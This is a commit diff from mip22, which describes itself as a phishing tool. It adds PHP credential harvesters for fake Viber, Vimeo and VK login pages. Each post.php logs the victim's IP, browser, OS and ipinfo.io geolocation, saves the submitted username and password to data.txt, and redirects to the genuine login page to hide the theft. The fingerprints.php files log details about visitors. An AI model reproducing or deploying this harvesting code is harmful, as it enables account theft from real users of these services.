+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nVIBER OUT VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['phone_number'] ."\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['password'] ."\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://account.viber.com/en/login"/> 

+ 126 - 0
.pages/vimeo/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nVIMEO VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

Файлын зөрүү хэтэрхий том тул дарагдсан байна
+ 36 - 0
.pages/vimeo/index.html


+ 25 - 0
.pages/vimeo/index.php

@@ -0,0 +1,25 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

+ 130 - 0
.pages/vimeo/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nVIMEO VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['email'] . "\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['password'] . "\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://vimeo.com/log_in"/> 

Файлын зөрүү хэтэрхий том тул дарагдсан байна
+ 0 - 0
.pages/vk/b-0f6403442fbf95cd84849e54d8e9ab53.ddb71f5a609d75e3ef6e.js.download


Файлын зөрүү хэтэрхий том тул дарагдсан байна
+ 0 - 0
.pages/vk/b-93dd9d3be5cab15401cc628b931eb724.9cac7b4a6901a4dab64f.js.download


Файлын зөрүү хэтэрхий том тул дарагдсан байна
+ 0 - 0
.pages/vk/common.6d5af9c51c7e29087e36.js.download


Файлын зөрүү хэтэрхий том тул дарагдсан байна
+ 0 - 0
.pages/vk/common.css


BIN
.pages/vk/counter


+ 126 - 0
.pages/vk/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nVK VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

Файлын зөрүү хэтэрхий том тул дарагдсан байна
+ 119 - 0
.pages/vk/index.html


+ 25 - 0
.pages/vk/index.php

@@ -0,0 +1,25 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

BIN
.pages/vk/p


Файлын зөрүү хэтэрхий том тул дарагдсан байна
+ 0 - 0
.pages/vk/polyfills.c5f9a2ced681ad88809a.js.download


+ 130 - 0
.pages/vk/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nVK VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['email'] . "\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['pass'] . "\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://m.vk.com/"/> 

Файлын зөрүү хэтэрхий том тул дарагдсан байна
+ 0 - 0
.pages/vk/vendors.2773b57485e379f375b2.js.download


Энэ ялгаанд хэт олон файл өөрчлөгдсөн тул зарим файлыг харуулаагүй болно